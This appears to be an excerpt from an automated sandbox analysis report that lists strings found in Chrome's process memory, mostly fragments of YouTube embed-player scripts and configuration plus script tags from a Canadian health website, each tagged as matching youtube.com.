Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: new Set;this.deviceIsAudioOnly=!(z==null||!z.deviceIsAudioOnly);this.II=YK(this.II,B.ismb);this.EM?(F=B.vss_host||"s.youtube.com",F==="s.youtube.com"&&(F=mR(this.yW)||"www.youtube.com")):F="video.google.com";this.Lt=F;nY(this,B,!0);this.lO=new Wo;g.m(this,this.lO);r=z?z.innertubeApiKey:l9("",B.innertube_api_key);C=z?z.innertubeApiVersion:l9("",B.innertube_api_version);F=z?z.innertubeContextClientVersion:l9("",B.innertube_context_client_version);r=g.ek("INNERTUBE_API_KEY")||r;C=g.ek("INNERTUBE_API_VERSION")|| equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501264021.000028EC068D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: onts.load) {document.fonts.load(\"400 10pt Roboto\", \"E\"); document.fonts.load(\"500 10pt Roboto\", \"E\");}","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: ource":"var yterr = yterr || true;","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ow,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352294336.000028EC048E9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2356027264.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352294336.000028EC048E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false}h5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323720471.000028EC04B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: qFInvW7qQzGlz1v925r6qWB/HQhPblbCnREuLAYUfwakEzjE7ndmB0NvFdWxoiDWlyQ0+ZPDTHQBw9Fm06CKIZaNiIh45kdidIr1UW8danaeEO6+YHG0Rivn/TyM2kI3G7ei4OTvyCRpx+0DXUMA93MJE52kq3k2+ma1U+iTAFC7QJjvH4iLFgXjUHCjE7FBjgyAq/UkkSZsO2fRZ1l2ok5PgkPoYSA/2u346iT//+Yo85JMu26FLhPczPtyFfsVmJKr0gUX9N9F46dWGmXRqgdtHBcT7a4R2SFOKmdAFAOtzCyKPI8oynurTOlccYXros9Tpm4mUVwrpeNa+vRM620o7ob45SQuIAd5kIlH7wvM1rN9lIotDWffHs6zJUrRcYXS3/Xn+QLEg2eTmpeBsthdz+nO0LYo/6W92GsMqbMqUmH9zNrAofNze0j3oYHmllEUcIbliJP2PP9+ywhZU1KjCwppRleCyBrg2hst2eV1sjEQ6cTayJeuTSpg7wlP6COfy2kJ4ZBIAZAkJ/bDiY2KQdFqh/eTD4w9mzMdHC8oBFmE6jyBU5vDlbjqakfe25xnZ8jnC7Qx0h5OQqbw3idhDbX4YlfrmtbtsYBUj5TRf+2rl1SePWUsccX8QNNfDRJ137WM/bxLg163DKv0jDCug/dUe1nzqeAtSezwlgLsc25iBsbJYm5208SkJsCnx5OWoAU2cy2yOi+iBDZ7rCz2H8bQMyKekGqPC5LeVyskel6l1Glhyst4DttMieJJVPVbZNBunD6wNG0eFToQ9FnP4LQ8r6jtAtBNtadLO7ePHbQgdfwZ8oUNtCTB4gnm57xIH3yEPXtflU9spoGv/xfFGgcSWe20VJ1r2jB2nZprzGKeiLg8CWDZqTQlR+kq2UROhydkeL5omaHwNnY2KuvyU/h62tNKBwAuxOED7r2e3qQso3XJNnxqQDTNZ//j71sGx4rIpd11VQKMl/r3IuYL26zynFAEVOoXXb9GI1FEI6+GUS+hRwn84JQaP8vL3eEx4k2xeulRba/gXZF3znpeR22I60k2jV/NZrSTWmOiewUGzX5Ur/EqnRVQoS0xKFdAAlkALOuBzNA/s90DN6aaECp6dmEAKlYj9/dsv3iLKRqoJXVmTAwfONRkqODMe1A9B0M\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFRO_8nQGG9ORNDSzmkPn-Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"gobWGqPjLSQ\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"gobWGqPjLSQ\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: rentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323134548.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2321018206.000028EC04C90000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: riginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: rimary] PipeControlMessageHandlerhttps://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXler equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ript","source":"var ytcsi={gt:function(n){n=(n||\"\")+\"data_\";return ytcsi[n]||(ytcsi[n]={tick:{},info:{},gel:{preLoggedGelInfos:[]}})},now:window.performance&&window.performance.timing&&window.performance.now&&window.performance.timing.navigationStart?function(){return window.performance.timing.navigationStart+window.performance.now()}:function(){return(new Date).getTime()},tick:function(l,t,n){var ticks=ytcsi.gt(n).tick;var v=t||ytcsi.now();if(ticks[l]){ticks[\"_\"+l]=ticks[\"_\"+l]||[ticks[l]];ticks[\"_\"+l].push(v)}ticks[l]=\nv},info:function(k,v,n){ytcsi.gt(n).info[k]=v},infoGel:function(p,n){ytcsi.gt(n).gel.preLoggedGelInfos.push(p)},setStart:function(t,n){ytcsi.tick(\"_start\",t,n)}};\n(function(w,d){function isGecko(){if(!w.navigator)return false;try{if(w.navigator.userAgentData&&w.navigator.userAgentData.brands&&w.navigator.userAgentData.brands.length){var brands=w.navigator.userAgentData.brands;var i=0;for(;i<brands.length;i++)if(brands[i]&&brands[i].brand===\"Firefox\")return true;return false}}catch(e){setTimeout(function(){throw e;})}if(!w.navigator.userAgent)return false;var ua=w.navigator.userAgent;return ua.indexOf(\"Gecko\")>0&&ua.toLowerCase().indexOf(\"webkit\")<0&&ua.indexOf(\"Edge\")<\n0&&ua.indexOf(\"Trident\")<0&&ua.indexOf(\"MSIE\")<0}ytcsi.setStart(w.performance?w.performance.timing.responseStart:null);var isPrerender=(d.visibilityState||d.webkitVisibilityState)==\"prerender\";var vName=!d.visibilityState&&d.webkitVisibilityState?\"webkitvisibilitychange\":\"visibilitychange\";if(isPrerender){var startTick=function(){ytcsi.setStart();d.removeEventListener(vName,startTick)};d.addEventListener(vName,startTick,false)}if(d.addEventListener)d.addEventListener(vName,function(){ytcsi.tick(\"vc\")},\nfalse);if(isGecko()){var isHidden=(d.visibilityState||d.webkitVisibilityState)==\"hidden\";if(isHidden)ytcsi.tick(\"vc\")}var slt=function(el,t){setTimeout(function(){var n=ytcsi.now();el.loadTime=n;if(el.slt)el.slt()},t)};w.__ytRIL=function(el){if(!el.getAttribute(\"data-thumb\"))if(w.requestAnimationFrame)w.requestAnimationFrame(function(){slt(el,0)});else slt(el,16)}})(window,document);\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2361080797.000028EC07D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2483711870.000028EC03624000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2355248038.000028EC062D8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ript","source":"window.WIZ_global_data = {\"MUE6Ne\":\"youtube_web\",\"MuJWjd\":false,\"UUFaWc\":\"%.@.null,1000,2]\",\"cfb2h\":\"youtube.web-front-end-critical_20250520.08_p0\",\"fPDxwd\":[],\"iCzhFc\":false,\"nQyAE\":{},\"oxN3nb\":{\"1\":false,\"0\":false,\"610401301\":false,\"899588437\":false,\"725719775\":false,\"513659523\":false,\"568333945\":false,\"1331761403\":false,\"651175828\":false,\"722764542\":false,\"748402145\":false,\"748402146\":false,\"1981196515\":false,\"103340015\":false,\"555019702\":false},\"u4g7r\":\"%.@.null,1,2]\",\"vJQk6\":false,\"xnI9P\":true,\"xwAfE\":true,\"yFnxrf\":2486};","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484973258.000028EC03774000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: ript","source":"window.yterr=window.yterr||true;window.unhandledErrorMessages={};\nwindow.onerror=function(msg,url,line,opt_columnNumber,opt_error){var err;if(opt_error)err=opt_error;else{err=new Error;err.message=msg;err.fileName=url;err.lineNumber=line;if(!isNaN(opt_columnNumber))err[\"columnNumber\"]=opt_columnNumber}var message=String(err.message);if(!err.message||message in window.unhandledErrorMessages)return;window.unhandledErrorMessages[message]=true;var img=new Image;window.emergencyTimeoutImg=img;img.onload=img.onerror=function(){delete window.emergencyTimeoutImg};var values=\n{\"client.name\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_NAME\"),\"client.version\":ytcfg.get(\"INNERTUBE_CONTEXT_CLIENT_VERSION\"),\"msg\":message,\"type\":\"UnhandledWindow\"+err.name,\"file\":err.fileName,\"line\":err.lineNumber,\"stack\":(err.stack||\"\").substr(0,500)};var parts=[ytcfg.get(\"EMERGENCY_BASE_URL\",\"/error_204?t=jserror&level=ERROR\")];var key;for(key in values){var value=values[key];if(value)parts.push(key+\"=\"+encodeURIComponent(value))}img.src=parts.join(\"&\")};\n","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}w.youtube.com/youtubei/v1/log_event?alt=json equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2344383176.000028EC06ACE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: s\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FFU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: scriptQIhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js@@ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: scriptSKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: scriptSKhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.jsb equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: t src=\"https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.js\" integrity=\"sha256-29KjXnLtx9a95INIGpEvHDiqV/qydH2bBx0xcznuA6I=\" crossorigin=\"anonymous\"></script>\n<script src=\"/themes/custom/foh/js/custom.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/script.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/thrivequestion.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/banner-slider.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/drupal.bootstrap.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/attributes.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/theme.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.behaviors.js?v=10.1.0\"></script>\n<script src=\"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script src=\"/core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.ajax.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/dialog.ajax.js?swjs7b\"></script>\n<script src=\"/libraries/json2/json2.js?v=2\"></script>\n<script src=\"/libraries/jquery.cycle/jquery.cycle.all.js?v=3.0.3\"></script>\n<script src=\"/modules/views_slideshow/modules/views_slideshow_cycle/js/views_slideshow_cycle.js?swjs7b\"></script>\n<script src=\"/modules/views_slideshow/js/views_slideshow.js?v=10.1.0\"></script>\n\n \n\n<div id=\"drupal-live-announce\" class=\"visually-hidden\" aria-live=\"polite\" aria-busy=\"false\"></div><div id=\"drupal-modal\" class=\"ui-front\" style=\"display: none;\"></div></body>","favicon":"https://fountainofhealth.ca/sites/default/files/FOH%20-%20Favicon.png","currentUrl":"https://fountainofhealth.ca/en","listArrString":["https://fountainofhealth.ca/en/thrive-c-approach-wellbeing","https://wellnessapp.ca/app/login","https://fountainofhealth.ca/en/thrive/resources","https://www.mentalhealthns.ca/fountain-of-health","https://fountainofhealth.ca/en/about-us","https://fountainofhealth.ca/","https://fountainofhealth.ca/about-us#about-foh-learning-center","https://fountainofhealth.ca/en/f
Source: chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: t src=\"https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.js\" integrity=\"sha256-29KjXnLtx9a95INIGpEvHDiqV/qydH2bBx0xcznuA6I=\" crossorigin=\"anonymous\"></script>\n<script src=\"/themes/custom/foh/js/custom.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/script.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/thrivequestion.js?swjs7b\"></script>\n<script src=\"/themes/custom/foh/js/banner-slider.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/drupal.bootstrap.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/attributes.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/theme.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.behaviors.js?v=10.1.0\"></script>\n<script src=\"/core/misc/states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/misc/states.js?swjs7b\"></script>\n<script src=\"/modules/webform/js/webform.states.js?v=10.1.0\"></script>\n<script src=\"/modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/popover.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/tooltip.js?swjs7b\"></script>\n<script src=\"/core/misc/displace.js?v=10.1.0\"></script>\n<script src=\"/core/misc/jquery.tabbable.shim.js?v=10.1.0\"></script>\n<script src=\"/core/misc/position.js?v=10.1.0\"></script>\n<script src=\"/themes/bootstrap/js/modal.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/dialog.js?swjs7b\"></script>\n<script src=\"/themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b\"></script>\n<script src=\"/core/misc/dialog/dialog.js?v=10.1.0\"></script>\n<script src=\"/core/misc/dialog/dialog.position.js?v=10.1.0\"></script>\n<script 